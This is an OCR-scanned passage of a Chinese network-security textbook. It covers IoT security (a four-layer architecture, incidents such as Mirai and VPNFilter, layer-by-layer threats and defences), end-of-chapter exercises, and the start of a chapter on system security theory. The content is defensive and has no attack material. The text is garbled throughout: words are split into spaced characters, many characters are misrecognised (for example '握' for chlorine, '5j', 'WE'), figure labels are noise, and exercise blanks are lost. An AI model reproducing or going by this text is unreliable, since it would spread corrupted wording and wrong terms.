(4) 移动 互联 网 安全 管理 和 规范 

移动 互联 网 已 成 为 信息 产业 中 发 展 快速 .竞争 激烈 、 创 新 活跃 的 重点 领域 之 一 , 正 迅 
速 地 向 经 济 ,社会 ,文化 等 多 个 领域 广泛 渗透 。 移 动 互联 网 的 持续 健康 快速 发 展 ,对 推动 
技术 进步 .促进 信息 消费 .推进 信息 领域 供给 侧 结构 性 改革 具有 重要 意义 。 统 一 的 行业 标 
WE .规范 和 协议 是 推动 移动 互联 网 发 展 的 关键 环节 。 近 年 来 ,我国 已 制定 了 关于 移动 互联 
网 的 相关 法 律 .法规 和 标准 。 未 来 我 国 还 须 不 断 完善 和 优化 综合 标准 化 技术 体系 ,加 强 与 
国际 标准 化 组 织 的 交流 与 合作 ,推动 我 国 移动 互联 网 标准 国际 化 的 进程 。 


3.4.8. 物 联 网 安全 


1. 物 联 网 的 概念 
物 联网 (The Internet of Things,IoT) 是 指 通过 各 种 信息 传感器 .射频 识别 技术 全球 
定位 系统 .红外 感应 器 、 激 光 扫描 器 等 装置 与 技术 ,实时 采集 需要 监控 .连接 .互动 的 物体 
或 过 程 , 采 集 其 声 . 光 、 热 . 电 \ 力 学 .化 学 .生物 .位置 等 需要 的 信息 ,通过 各 种 可 能 的 网 络 
接 入 ,进行 物 与 物 , 物 与 人 的 泛 在 连接 ,实现 对 物品 和 过 程 的 智能 化 感知 识别 和 管理 。 物 
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联网 是 一 个 基于 互联 网 ,传统 电信 网 等 的 信息 承载 体 , 它 让 所 有 能 够 被 独立 寻 址 的 普通 物 
理 对 象 实现 互联 互通 。 

物 联 网 的 理念 最 早 由 比尔 。 盖 茨 在 1995 年 出 版 的 (未 来 之 路 ) 中 提出 。2005 年 , 国 
际 电信 联盟 发 布 了 《ITU 互联 网 报告 2005: 物 联网 )。 报 告 指出 , 物 联网 时 代 即 将 来 临 ， 
世界 上 所 有 的 物体 ,从 轮胎 到 牙刷 ,从 房屋 到 纸巾 ,都 可 以 通过 互联 网 进行 信息 交换 。 随 
后 ,世界 各 国 相继 将 发 展 物 联网 提 上 日 程 ,并 制定 了 详细 的 规划 。 

物 联网 形式 多 样 ,技术 复杂 。 根 据 信息 生 成 、 传 输 、 处 理 和 应 用 的 原则 , 物 联 网 可 分 为 
4 层 , 即 感知 识别 层 、 网 络 构建 层 ,管理 服务 层 和 综合 应 用 层 , 如 图 3-37 所 示 。 


智慧 物流 智能 交通 环境 监测 

管理 服务 层 [ 3 * 
数据 中 心 数据 挖掘 智能 决策 

(Q) 和 A A 

网 络 构建 层 e e k 水 A A 
无 线 局 域 网 互联 网 无 线 广域网 无 线 城 域 网 
"£8 oa 令 WE 
传感器 RFID 智能 设备 


图 3-37 物 联 网 组 成 架构 


CD 感知 识别 层 是 物 联网 的 核心 技术 ,是 物理 世界 和 信息 世界 之 间 的 桥梁 和 纽带 。 感 
知识 别 层 包括 射频 识别 (FRID) ,无 线 传感器 和 各 种 智能 电子 产品 ,对 物质 性 质 、 环 境 状 态 
和 行为 模式 等 信息 进行 大 规模 长 期 .实时 的 获取 。 

@ 网 络 构建 层 的 主要 作用 是 把 感知 识别 层 设备 接 入 互联 网 , 供 上 层 服 务 使 用 。 互 联 
网 是 物 联 网 的 核心 网 络 ,边缘 的 其 他 无 线 网 络 提供 随时 随地 网 络 接 人 服务 。 不 同类 型 的 
无 线 网 络 适 用 于 不 同 的 应 用 场景 ,提供 便捷 的 网 络 接 人 服务 ,是 实现 物 物 互联 的 重要 基础 
设施 。 

C) 管理 服务 层 在 高 性 能 计算 和 海量 存储 技术 的 支撑 下 ,将 大 规模 数据 高 效 、 可 靠 地 
组 织 起 来 ,运用 运筹 学 数据 挖掘 、 人 工 智能 等 技术 为 上 层 行业 应 用 提供 智能 的 支撑 平台 。 

@ 综合 应 用 层 包 括 以 数据 服务 为 主要 特征 的 文件 传输 、 电 子 邮 件 等 应 用 ,以 用 户 为 
中 心 的 万 维 网 ,电子 商务 .视频 点 播 . 网 络 游戏 等 应 用 ,以 及 物品 追踪 、 环 境 感知 .智能 物 
流 、 智 能 交通 、 智 慧 家 庭 等 应 用 。 

物 联网 各 层 之 间 既 相对 独立 又 紧密 联系 。 在 综合 应 用 层 以 下 ,同一 层 上 的 不 同 技术 
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互 为 补充 ,适用 于 不 同 环境 ,构成 该 层 技术 的 全 套 应 对 策略 。 而 不 同 层次 提供 各 种 技术 的 
配置 和 组 合 , 根 据 应 用 需求 ,构成 完整 的 解决 方案 。 


2. 物 联网 面临 的 新 安全 挑战 

近年 来 , 物 联网 安全 事件 在 全 球 范围 内 频频 发 生 。2016 年 10 月 ,美国 DNS 管理 优 
化 提供 商 Dyn 遭遇 由 暴露 在 互联 网 上 大 量 存在 弱 口 令 漏洞 摄像 头 组 成 的 僵尸 网 络 Mirai 
发 起 的 DDoS 攻击 。2017 年 9 H , 物 联 网 安全 研究 公司 Armis 在 蓝牙 协议 中 发 现 了 8 个 
零 日 漏洞 ,这些 漏洞 影响 了 50 多 亿 台 物 联网 设备 的 安全 运行 。2018 年 5 月 ,思科 Talos 
安全 研究 团队 发 现 攻击 者 利用 恶意 程序 VPNFilter 感染 了 全 球 54 个 国家 超过 50 万 台 路 
由 器 和 NAS 设备 等 。 

目前 ,国家 、 企 业 及 个 人 尚未 树立 起 足够 强 的 物 联 网 安全 与 隐私 保护 意识 。 同 时 ,大 
部 分 厂商 认为 额外 的 安全 措施 不 会 提高 设备 自身 的 市 场 价值 ,只 会 增加 其 生产 成 本 。 因 
此 ,许多 厂商 在 产品 销售 后 并 不 为 用 户 提 供 补 丁 和 更 新 服务 ,从 而 导致 现 有 物 联 网 设备 长 
期 存在 默认 口令 、 明 文 传输 密 钥 等 大 量 高 危 漏洞 。 

以 图 3-37 所 示 的 物 联网 组 成 架构 为 基础 ,各 层面 临 的 安全 挑战 包括 : 

CD 感知 识别 层面 临 的 主要 安全 挑战 

。 网 关节 点 被 攻击 者 控制 ,安全 性 全 部 丢失 。 

。 普通 节点 被 攻击 者 控制 (如 攻击 者 掌握 普通 节点 密 钥 ) 。 

。 普通 节点 被 攻击 者 捕获 (但 攻击 者 没有 得 到 普通 节点 密 钥 ) 。 

。 普通 节点 或 者 网 关节 点 遭受 来 自 于 网 络 的 DOS 攻击 。 

* 接 人 到 物 联网 的 超大 量 传感器 节点 的 标识 .识别 .认证 和 控制 问题 。 

(2) 网 络 构建 层面 临 的 主要 安全 挑战 

* DOS 攻击 .DDOS 攻击 。 

* 假冒 攻击 .中 间 人 攻击 等 。 

。 跨 异 构 网 络 的 网 络 攻击 。 

(3) 管理 服务 层面 临 的 主要 安全 挑战 

* 来自 于 超大 量 终 端的 海量 数据 的 识别 和 处 理 。 

。 智能 变 为 低能 。 

。 自动 变 为 失控 。 

。 灾难 控制 和 恢复 。 

。 非法 人 为 干预 。 

。 设备 (特别 是 移动 设备 ) 丢 失 。 

(4) 综合 应 用 层面 临 的 主要 安全 挑战 

。 如 何 根据 不 同 访问 权限 对 同一 数据 库 内 容 进 行 筛 选 。 

。 如 何 提供 用 户 隐私 信息 保护 ,同时 又 能 正确 认证 。 

。 如 何 解决 信息 泄露 追踪 问题 。 

。 如 何 进行 计算 机 取证 。 

。 如 何 销毁 计算 机 数据 。 
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。 如 何 保护 电子 产品 和 软件 的 知识 产权 。 


3. 物 联网 主要 安全 防护 技术 

物 联网 的 健康 发 展 需 要 信息 安全 保护 技术 提供 安全 保障 ,但 传统 的 信息 安全 技术 不 
能 直接 移植 应 用 ,需要 重新 搭建 物 联网 安全 架构 ,并 在 此 架构 下 采用 适用 的 具体 方案 。 本 
节 以 图 3-37 所 示 的 物 联网 组 成 架构 为 基础 ,讨论 相关 安全 技术 。 

CD 感知 识别 层 安全 

在 感知 识别 层 的 传 感 网 内 部 ,需要 有 效 的 密 钥 管理 机 制 ,用 于 保障 传 感 网 内 部 通信 的 
机 密 性 和 认证 性 。 机 密 性 需要 在 通信 时 建立 一 个 临时 会 话 密 钥 ,而 认证 性 可 以 通过 对 称 
密码 或 非 对 称 密码 方案 解决 。 使 用 非 对 称 密码 技术 的 传 感 网 一 般 有 具有 较 好 的 计算 和 通信 
能 力 ,并 且 对 安全 性 要 求 更 高 。 当 传 感 网 节点 资源 受 限 时 .需要 轻 量 级 安全 技术 。 

(2) 网 络 构 建 层 安全 

网 络 构建 层 的 安全 架构 主要 包括 : 节点 认证 、 数 据 机密 性 、 完 整 性 、 数 据 流 机 密 性 等 ， 
可 通过 跨 域 认证 和 跨 网 认证 、 端 对 端 加 密 、 支 持 组 播 和 广播 的 密码 算法 和 安全 协议 等 技术 
保障 。 网 络 构建 层 还 应 考虑 传统 网 络 中 DDOS 攻击 的 检测 与 预防 。 

(3) 管理 服务 层 安全 

物 联 网 管理 服务 层 主要 的 安全 技术 包括 : 高 强度 数据 机 密 性 和 完整 性 服务 ,入 侵 检 
测 和 病毒 检测 ,恶意 指令 分 析 和 预防 ,访问 控制 及 灾难 恢复 机 制 , 保 密 日 志 跟 踪 和 行为 分 
析 , 恶 意 行为 模型 的 建立 ,移动 设备 文件 (包括 机 密 文件 ) 的 可 备份 和 恢复 ,移动 设备 识别 、 
定位 和 追踪 机 制 等 。 

(4) 综合 应 用 层 安 全 

综合 应 用 层 主 要 的 安全 技术 包括 : 有 效 的 数据 库 访 问 控制 和 内 容 筛 选 机 制 , 不 同 应 
用 场景 的 隐私 信息 保护 技术 ,上 叛 道 追踪 和 其 他 信息 泄露 追踪 机 制 , 有 效 的 计算 机 取证 技 
术 , 安 全 的 计算 机 数据 销毁 技术 ,安全 的 电子 产品 和 软件 知识 产权 保护 技术 。 

物 联 网 的 安全 问题 不 仅仅 是 技术 问题 ,还 会 涉及 教育 \ 信 息 安 全 管理 ,口令 管理 等 非 
技术 因素 。 在 物 联 网 的 设计 和 使 用 过 程 中 .除了 需要 加 强 技术 手段 提高 物 联网 安全 的 保 
护 力 度 外 ,还 应 注重 对 物 联网 安全 有 影响 的 非 技术 因素 ,从 整体 上 降低 信息 被 非法 获取 和 
使 用 的 概率 。 


”35 习题 


1. 填空 题 
(1) 安全 性 攻击 可 以 划分 为 和 
(2) X.800 定义 的 5 类 安全 服务 是 
和 
(3) X.800 定义 的 8 种 特定 的 安全 机 制 是 
(4) X.800 定义 的 5 种 普遍 的 安全 机 制 是 
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和 
(5) 防火 墙 可 以 分 为 
和 7 种 类 型 。 
(6) 静态 包 过 滤 防 火 墙 工作 于 OSI 模型 的 层 上 , 它 对 数据 包 的 某 些 特定 域 
行 检查 ,这 些 特定 域 包括 : " " - 和 á 
(7) 根据 数据 的 来 源 不 同 ,IDS 可 分 为 和 3 种 类 型 。 
(8) 一 个 通用 的 IDS 模型 主要 由 n n 和 4 部 分 
组 成 。 
(9) 根据 访问 方式 的 不 同 ,VPN 可 以 分 为 和 两 种 类 型 。 
(10) VPN 的 关键 技术 包括 " 和 c2 
(OD 移动 互联 网 的 组 成 结构 主要 包括 s 和 
(12) 移动 互联 网 安全 主要 包括 和 
(13) 根据 信息 生成 传输、 处 理 和 应 用 的 原则 , 物 联网 可 以 分 为 四 层 ， 分 别 为 
和 


dD 物 联网 网 络 构建 展 的 安全 架构 主要 包括 ， 
等 ,可 通过 跨 域 认证 和 跨 网 认证 . 端 对 端 加 密 .支持 组 播 和 广播 的 密码 算法 和 安 
全 协议 等 技术 保障 。 


2. 思考 题 
(1) 基本 的 安全 威胁 有 哪些 ? 
(2) 主动 攻击 和 被 动 攻 击 有 何 区 别 ? 请 举例 说 明 。 
(3) 网 络 攻击 的 常见 形式 有 哪些 ?请 逐一 加 以 评述 。 
(4) 请 简 述 安全 服务 与 安全 机 制 之 间 的 关系 。 
(5) 防火 墙 一 般 有 几 个 接口 ? 什么 是 防火 墙 的 非 军事 区 (DMZ)? 它 的 作用 是 什么 ? 
(6) 防火 墙 有 什么 局 限 性 ”只 靠 防 火 墙 是 否 能 确保 某 个 单位 的 网 络 安全 ? 
(7) 入 侵 检测 系统 的 定义 是 什么 ? 
(8) 入 侵 检测 系统 按照 功能 可 分 为 哪 几 类 ? 有 哪些 主要 功能 ? 
(9) 简 述 NIDS、HIDS 和 DIDS 三 种 类 型 IDS 之 间 的 区 别 。 
(10) IPSec VPN 有 哪 两 种 工作 模式 ? 如 何 通 过 数据 包 格 式 区 分 这 两 种 工作 模式 ? 
(QD 请 比较 TLS VPN 与 IPSec VPN 之 间 的 异同 点 。 
(12) 你 认为 IPSec VPN 5j SSL VPN 可 以 相互 替代 吗 ? 为 什么 ? 
(13)《 网 络 安全 法 ) 第 二 十 一 条 规定 ,国家 实行 网 络 安全 等 级 保护 制度 。 我 国 的 网 络 
安全 划分 为 哪 几 个 安全 等 级 ?每 个 安全 等 级 的 划分 依据 是 什么 ? 
(14) 工业 互联 网 属于 第 几 次 工业 革命 ? 工业 互联 网 有 哪些 主要 特点 ? 
5) 针对 工业 互联 网 的 攻击 发 起 点 有 哪些 ? 有 哪些 具体 威胁 ? 
6) 物 联 网 感知 识别 层面 临 哪些 安全 挑战 ? 


一 


一 
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网 络 空间 的 系统 安全 (System Security) 聚 焦 于 系统 的 安全 性 。 虽 然 系 统 是 由 它 的 组 
成 部 分 (简称 为 组 件 ) 连 接 起 来 构成 的 ,但 系统 安全 的 观点 认为 不 能 把 系统 仅仅 看 作 组 件 
的 集合 和 连接 的 集合 ,还 必须 把 系统 自身 看 作 一 个 完整 的 单元 ,也 就 是 说 ,要 以 整体 的 观 
点 去 看 待 系统 。 组 件 和 连接 本 身 也 存在 安全 问题 ,但 它们 不 是 系统 安全 关注 的 重点 ,系统 
安全 探讨 把 组 件 连接 起 来 并 用 在 它们 所 构成 的 系统 之 中 所 涉及 的 安全 问题 。 

系统 安全 包含 两 层 含义 ,其 一 是 要 以 系统 思维 应 对 安全 问题 ,其 二 是 要 应 对 系统 所 面 
临 的 安全 问题 ,两 者 相辅相成 ,深度 融合 。 系 统 安全 的 指导 思想 是 : 在 系统 思维 的 指引 
下 ,从 系统 建设 .使 用 和 报废 的 整个 生命 周期 应 对 系统 所 面临 的 安全 问题 ,正视 系统 的 体 
系 结构 对 系统 安全 的 影响 ,以 生态 系统 的 视野 全 面 审视 安全 对 策 。 


”41 系统 安全 概述 


古人 云 : 以 史 为 鉴 , 可 以 知 兴 替 。 本 节 从 概略 地 回顾 系统 安全 的 发 展 历程 开始 ,感受 
系统 安全 学 科 的 本 原意 义 和 未 来 走向 。 进 而 , 迈 入 探讨 系统 安全 之 旅 。 以 对 系统 的 认识 
为 基础 ,考察 系统 安全 研究 的 方法 论 ,理解 贯穿 系统 安全 始终 的 思维 方式 。 


4.1.1 系统 安全 的 演进 


网 络 空间 (Cyberspace) 是 人 类 活动 的 第 五 大 疆域 。 虽 然 海 . 陆 、 空 .天 那 四 大 自然 疆 
域 的 起 源 还 是 个 恋 , 但 网 络 空间 这 个 人 工 疆 域 的 起 源 是 清晰 的 , 它 随 着 计算 机 的 诞生 而 逐 
渐 形 成 。 在 网 络 空间 中 ,系统 安全 则 由 操作 系统 的 问世 而 俊生。 所 以 ,时 至 今日 ,每 当 提 
起 系统 安全 时 ,人 们 自然 而 然 地 会 想到 操作 系统 安全 , 那 是 有 道理 的 。 

世界 上 第 一 台 通 用 电子 计算 机 诞生 于 20 世纪 40 年 代 , 即 1946 年 , 它 的 名 字 叫 
ENIAC。 那 是 一 台 纯 粹 的 硬件 裸 机 ,没有 任何 软件 。20 世纪 50 年 代 中 期 ,世界 上 第 一 个 
操作 系统 问世 , 那 是 一 种 简单 的 批 处 理 系统 ,从 此 ,计算 机 配 上 了 最 基础 的 软件 。20 世纪 
60 年 代 初 ,世界 上 第 一 个 分 时 操作 系统 CTSS 问世 。20 世纪 60 年 代 末 ,世界 上 第 一 个 安 
全 操作 系统 出 现 . 它 叫 Adept-50, 属 于 分 时 系统 。 

安全 操作 系统 的 设计 与 实现 是 系统 安全 领域 早期 最 核心 的 研究 与 实践 工作 ,对 推动 
系统 安全 的 发 展 发 挥 了 举足轻重 的 作用 。 这 方面 的 很 多 工作 都 是 在 美国 军 方 的 资助 下 开 
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展 的 。 实 际 上 ,早期 的 安全 操作 系统 就 是 为 了 满足 军事 方面 的 需求 而 设计 的 。 

1972 年 ,美国 空军 的 一 份 计算 机 安全 规划 研究 报告 提出 了 访问 监控 器 (Reference 
Monitor) ,访问 验证 机 制 (Reference Validation Mechanism) ,安全 核 (Security Kernel) 和 
安全 建 模 (Modeling) 等 重要 思想 。 这 些 思想 的 产生 源 于 对 系统 资源 受 控 共享 (Controlled 
Sharing) 问 题 的 研究 。 

1979 年 , 尼 巴 尔 第 (G.H. Nibaldi) 在 讨论 基于 安全 核 的 计算 机 安全 系统 的 设计 方法 
时 阐述 了 可 信 计 算 基 (TCB: Trusted Computing Base) 的 思想 ,该 方法 要 求 把 计算 机 系统 
中 所 有 与 安全 保护 有 关 的 功能 找 出 来 ,并 把 它们 与 系统 中 的 其 他 功能 分 离开 ,然后 把 它们 
独立 出 来 ,以 防止 遭 到 破坏 ,这 样 独立 出 来 得 到 的 结果 就 称 为 可 信 计 算 基 。 

稍微 形式 一 点 的 定义 是 : 可 信 计 算 基 指 一 个 计算 机 系统 中 负责 实现 该 系统 的 安全 策 
略 的 所 有 软 硬 件 资源 的 集合 , 它 的 重要 特性 之 一 是 能 够 防止 其 他 软 硬 件 对 其 造成 破坏 。 
可 信 计 算 基 思想 的 重要 启示 之 一 是 通过 硬件 .固件 和 软件 的 统一 体 来 构筑 系统 的 安全 性 
和 可 信 性 。 

早期 的 计算 机 是 大 型 主机 系统 ,一 台 ENIAC 可 以 占 满 整 个 大 房间 。 随 着 分 时 系统 
的 出 现 ,一 台大 型 主机 可 以 连接 多 个 硬件 终端 ,多 个 用 户 可 以 借助 这 样 的 终端 同时 使 用 一 
台大 型 主机 。 那 时 的 安全 任务 主要 是 按 等 级 控制 用 户 对 信息 的 访问 以 及 从 物理 上 防范 对 
系统 设施 的 滥用 盗窃 或 破坏 。20 世纪 60 年 代 到 90 年 代 , 大 量 的 工作 集中 在 操作 系统 
安全 方面 ,逐渐 地 ,也 拓展 到 数据 库 安 全 和 应 用 程序 安全 等 方面 。 

随 着 20 世纪 60 年 代 末 ARPANET 的 问世 ,70 年 代 Internet 的 兴起 ,80 年 代 万 维 网 
的 出 现 ,90 年 代 互联 网 的 普及 ,网 络 使 系统 的 形态 不 断 发 生变 化 ,早期 大 型 主机 类 型 的 系 
统 渐渐 演变 成 由 网 络 连接 起 来 的 系统 。 系 统 规模 越 来 越 大 ,结构 越 来 越 复杂 ,系统 安全 的 
新 间 题 日 显 突出 ,系统 安全 研究 的 视野 拓展 到 由 网 络 互 连 所 形成 的 场景 。 

进入 21 世纪 ,新 的 数字 化 设备 不 断 催生 新 的 应 用 ,特别 是 2009 年 物 联 网 诞生 之 后 ， 
其 渗透 不 断 广泛 深入 ,网 络 空间 生态 系统 的 影响 越 来 越 明 显 。 国 际 上 开始 注意 到 ,针对 日 
益 严 峻 的 系统 安全 新 挑战 ,必须 站 在 生态 系统 的 角度 加 以 应 对 。 

在 知识 传播 和 教育 方面 ,国际 上 对 系统 安全 的 认 知 也 越 来 越 清 晰 。 在 由 美国 计算 机 
学 会 和 电子 电气 工程 师 协 会 的 计算 机 学 会 组 成 的 联合 工作 组 发 布 的 CS 2013 课程 指南 
中 ,网 络 空 间 安 全 相关 的 内 容 仅 仅 以 “信息 保障 和 安全 ”一 个 知识 领域 的 形式 散落 在 "计算 
机 科学 ”知识 体系 之 中 。 在 由 上 述 两 个 机 构 以 及 若干 其 他 国际 知名 机 构 组 成 的 联合 工作 
组 发 布 的 CSEC 2017 课程 指南 中 ,网 络 空 间 安全 的 知识 体系 已 经 形成 ,系统 安全 已 成 为 
其 中 一 个 明确 的 知识 领域 。 

网 络 空间 中 的 系统 ,从 大 型 主机 系统 到 网 络 化 系统 ,再 到 网 络 空间 生态 系统 ,其 形态 
不 断 演变 ,其 内 涵 不 断 丰 富 , 其 影响 不 断 深入 。 与 此 同时 ,系统 安全 所 面临 的 挑战 更 加 严 
峻 ,系统 安全 的 探索 全 景 广阔 ,意义 深远 。 


4.1.2 ”系统 与 系统 安全 


要 想 很 好 地 理解 系统 安全 ,首先 应 该 认识 一 下 系统 。 说 到 系统 ,大 家 不 会 感到 陌生 。 
系统 的 例子 比比 皆 是 。 整 个 宇宙 是 一 个 大 系统 ,一 个 地 球 .一 个 国家 、 一 座 山 、 一 条 河 、 
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个 生物 .一 个 细胞 .一 个 分 子 , 分 别 都 是 一 个 系统 。 在 网 络 空间 中 ,整个 互联 网 是 一 个 系 
统 ,一 个 网 购 平台 .一 个 聊天 平台 、 一 个 校园 网 .一 台 计 算 机 、 一 部 手机 ,分 别 也 都 是 一 个 

系统 多 种 多 样 ,哪个 系统 会 受到 关注 ,这 取决 于 观察 者 。 通 常 ,每 当 讨论 一 个 系统 时 ， 
指 的 都 是 观察 者 感 兴趣 的 系统 。 由 于 系统 本 身 种 类 繁多 ,加 上 观察 者 的 观察 意图 不 同 , 系 
统 有 很 多 种 定义 ,以 下 是 一 个 描述 性 的 定义 。 

一 个 系统 (System) 是 由 相互 作用 或 相互 依赖 的 元 素 或 成 分 构成 的 某 种 类 型 的 一 个 
统一 整体 ,其 中 的 元 素 完 整地 关联 在 一 起 ,它们 之 间 的 这 种 关联 关系 有 别 于 它们 与 系统 外 
其 他 元 素 之 间 可 能 存在 的 关系 。 

上 述 定义 表明 ,一 个 系统 是 一 个 统一 整体 ,同时 ,系统 由 元 素 构成 ,另外 ,元 素 与 元 素 
之 间 的 关系 内 外 有 别 , 即 同属 一 个 系统 的 元 素 之 间 的 关系 不 同 于 它们 与 该 系统 外 其 他 元 
素 之 间 的 关系 。 该 定义 隐 含 着 系统 存在 边界 , 它 把 系统 包围 起 来 ,区 分 出 内 部 元 素 和 外 部 
元 素 。 位 于 系统 边界 内 部 的 属于 系统 的 组 成 元 素 ,位 于 系统 边界 外 部 的 属于 系统 的 环境 。 

系统 的 边界 有 时 是 明显 的 、 容 易 确定 的 ,有 时 是 模糊 的 、 难 以 确定 的 。 例 如 ,一 个 细胞 
的 边界 是 它 的 细胞 膜 ,显而易见 ,而 人 体 血 液 循环 系统 的 边界 就 不 那么 容易 确定 。 在 网 络 
空间 中 ,一 部 手机 的 边界 可 以 说 是 它 的 外 壳 ,看 得 见 摸 得 着 ,而 一 个 操作 系统 的 边界 却 很 
难 严格 划分 。 系 统 的 边界 也 不 是 唯一 的 、 一 成 不 变 的 , 随 着 观察 角度 的 不 同 可 能 会 发 生变 
化 。 但 是 ,不 管 怎样 ,系统 存在 着 边界 。 

对 系统 的 观察 可 以 采取 自 外 观察 法 ,也 可 以 采取 自 内 观察 法 。 自 外 观察 法 就 是 观察 
者 位 于 系统 之 外 对 系统 进行 观察 ,通常 是 通过 观察 系统 的 输入 和 输出 来 分 析 系统 的 行为 。 
自 内 观察 法 则 是 观察 者 位 于 系统 之 内 对 系统 进行 观察 ,此 时 ,观察 者 属于 系统 的 一 个 组 成 
部 分 ,该 方法 通常 是 通过 观察 系统 的 外 部 环境 来 分 析 系 统 的 行为 。 观 察 者 在 虎 园 外 观察 
园 内 老虎 的 行为 ,采用 的 是 自 外 观察 法 ,在 飞行 的 飞机 上 观察 飞机 的 飞行 状况 ,采用 的 是 
自 内 观察 法 。 

对 网 络 空间 中 的 系统 进行 观察 就 会 发 现 , 由 于 网 络 空间 中 天 然 地 存在 着 名 目 繁多 的 
安全 威胁 ,网 络 空间 中 的 系统 处 在 各 式 各 样 的 安全 风险 之 中 ,这 些 系统 必须 具有 一 定 的 安 
全 性 ,才能 在 风险 包围 之 中 也 能 正常 运转 。 系 统 的 安全 性 属于 系统 层级 所 具有 的 涌现 性 
属性 ,需要 在 建立 了 对 系统 的 认识 的 基础 上 ,以 系统 化 的 视野 去 观察 。 这 就 是 系统 安全 需 
要 探讨 的 课题 。 


4.1.3 整体 论 与 还 原 论 


研究 系统 安全 需要 有 正确 的 方法 论 。 在 传统 的 科学 研究 中 ,尤其 是 在 经 典 的 机 械 力 
学 研究 中 ,习惯 上 采取 还 原 论 的 方法 进行 研究 , 即 把 大 系统 分 解 为 小 系统 ,然后 通过 对 小 
系统 的 研究 去 推 知 大 系统 的 行为 。 例 如 ,在 牛顿 力学 中 ,就 是 对 整个 宇宙 进行 分 解 ,从 两 
个 物体 之 间 的 受 力 和 运动 着 手 ,试图 推 知 整个 宇宙 的 运动 情况 。 
系统 是 由 其 组 成 元 素 构成 的 。 例 如 ,一块 机 械 手 表 由 很 多 机 械 零 部 件 构成 ;一 个 人 可 
以 看 成 由 头 、 颈 躯干 和 四 肢 构成 ,也 可 以 看 成 由 皮肤 肌肉、 骨骼 .内脏 血液 循环 系统 和 
神经 系统 等 构成 。 还 原 论 把 大 系统 分 解 成 小 系统 ,就 是 把 系统 分 解 成 它 的 组 成 部 分 ,通过 
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对 系统 的 组 成 部 分 的 研究 去 了 解 原 有 系统 的 情况 。 

还 原 论 存在 着 局 限 性 ,因为 ,通过 对 系统 组 成 部 分 的 分 析 去 推 知 系统 的 性 质 这 条 路 并 
非 总 是 行 得 通 的 。 系 统 的 某 些 宏观 性 质 是 无 法 通过 其 微观 组 成 部 分 的 性 质 反 映 出 来 的 。 
例如 ,食盐 对 人 体 是 有 益 的 ,是 人 类 每 天 生活 的 必需 品 , 它 的 组 成 元 素 是 氯 元 素 和 钠 元 素 ， 
这 两 种 元 素 对 人 体 都 是 有 毒 的 。 再 如 ,不 管 从 上 面 提 到 的 哪个 角度 观察 人 的 构成 ,我 们 都 
无 法 通过 对 人 体 的 这 些 组 成 部 分 的 分 析 推 出 爱 因 斯 坦 的 科学 成 就 。 

针对 还 原 论 的 这 种 局 限 性 ,人 们 提出 了 整体 论 的 方法 。 整 体 论 方法 把 一 个 系统 看 成 
一 个 完整 的 统一 体 ,一 个 完整 的 被 观察 单位 ,而 不 是 简单 的 微观 组 成 元 素 的 集合 。 例 如 ， 
整体 论 方法 要 求 把 一 个 人 作为 一 个 完整 的 统一 体 进 行 观察 ,而 不 是 仅仅 简单 地 把 他 看 作 
头颈 .躯干 和 四 肢 的 集合 。 只 有 把 爱 因 斯 坦 作 为 一 个 完整 的 观察 对 象 , 才 有 可 能 了 解 他 
为 什么 会 取得 如 此 伟大 的 科学 成 就 。 

系统 的 宏观 特性 , 即 整体 特性 ,可 以 区 分 为 涌现 性 和 综合 特性 两 种 情形 。 

综合 特性 可 以 通过 系统 组 成 部 分 的 特性 的 综合 而 得 到 ,或 者 说 ,综合 特性 可 以 分 解 为 
系统 组 成 部 分 的 特性 。 例 如 ,一 个 国家 的 人 口 出 生 率 属于 综合 特性 , 它 是 一 个 国家 某 个 阶 
段 人 口 个 体 出 生 的 总 和 ,表示 为 一 个 国家 人 口 全 部 个 体 数量 的 百分比 。 

涌现 性 是 系统 组 成 部 分 相互 作用 产生 的 组 成 部 分 所 不 具有 的 新 特性 , 它 是 不 可 还 原 
( 即 不 可 分 解 ) 的 特性 。 上 面 提 到 的 盐 的 特性 属于 涌现 性 ,是 盐 的 组 成 部 分 握 元 素 和 钠 元 
素 所 不 具有 的 特性 ,是 氯 元 素 和 钠 元 素 相互 作用 产生 的 新 特性 。 

网 络 空间 中 的 安全 性 属于 涌现 性 。 经 典 的 观点 把 安全 性 描述 为 机 密 性 .完整 性 和 可 
用 性 。 仅 以 操作 系统 的 机 密 性 为 例 ,操作 系统 由 进程 管理 内存 管理 .外 设 管理 文件 管 
理 、 处 理 器 管理 等 子 系统 构成 ;就 算 各 个 子 系统 都 能 保证 不 泄露 机 密 信息 ,操作 系统 也 无 
法 保证 不 泄露 机 密 信息 ;隐藏 信道 泄露 机 密 信 息 就 是 一 种 情形 ,这 是 多 个 子 系统 相互 作用 
引起 的 ;换言之 ,操作 系统 的 机 密 性 无 法 还 原 到 它 的 子 系统 之 中 , 它 的 形成 依赖 于 子 系统 
的 相互 作用 。 

网 络 空间 中 系统 的 安全 性 是 系统 的 宏观 属性 ,属于 涌现 性 的 情形 , 它 不 可 能 简单 地 依 
靠 系统 的 微观 组 成 部 件 建立 起 来 , 它 的 形成 很 大 程度 上 依赖 于 微观 组 成 部 分 的 相互 作用 ， 
而 这 种 相互 作用 是 最 难 把 握 的 。 再 举 一 例 ,要 研究 一 个 网 购 系统 的 安全 性 ,仅仅 研究 构成 
该 网 购 系统 的 计算 机 、 软 件 或 网 络 等 的 安全 性 是 不 够 的 ,必须 把 整个 网 购 系统 看 成 一 个 完 
整 的 观察 对 象 , 才 有 可 能 找到 妥善 解决 其 安全 问题 的 措施 。 

整体 论 和 还 原 论 都 关心 整体 特性 ,但 它们 关心 的 是 整体 特性 中 的 两 种 不 同形 态 ,整体 
论 聚 焦 的 是 涌现 性 ,而 还 原 论 聚 焦 的 是 综合 特性 。 过 去 ,网 络 空间 安全 的 研究 与 实践 主要 
偏向 于 还 原 论 , 虽 然 ,在 早期 提出 的 可 信 计 算 基 概 念 中 蕴含 着 一 定 的 整体 论 思想 。 现 在 ， 
国际 上 已 经 意识 到 整体 论 在 解决 网 络 空间 安全 问题 中 的 重要 性 ,大 量 的 问题 有 待 不 断 
探索 。 


4.1.4 系统 安全 思维 


网 络 空间 系统 安全 知识 领域 的 核心 包含 着 两 大 理念 ,一 是 保护 对 象 ,二 是 思维 方法 。 
系统 一 方面 表示 会 受到 威胁 因此 需要 保护 的 对 象 , 男 一 方面 表示 考虑 安全 问题 时 应 具有 
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的 思维 方法 , 即 系统 化 思维 方法 。 系 统 化 思维 具有 普 适 性 ,不 是 网 络 空间 所 独 有 ,运用 到 
网 络 空间 安全 之 中 称 为 系统 安全 思维 。 

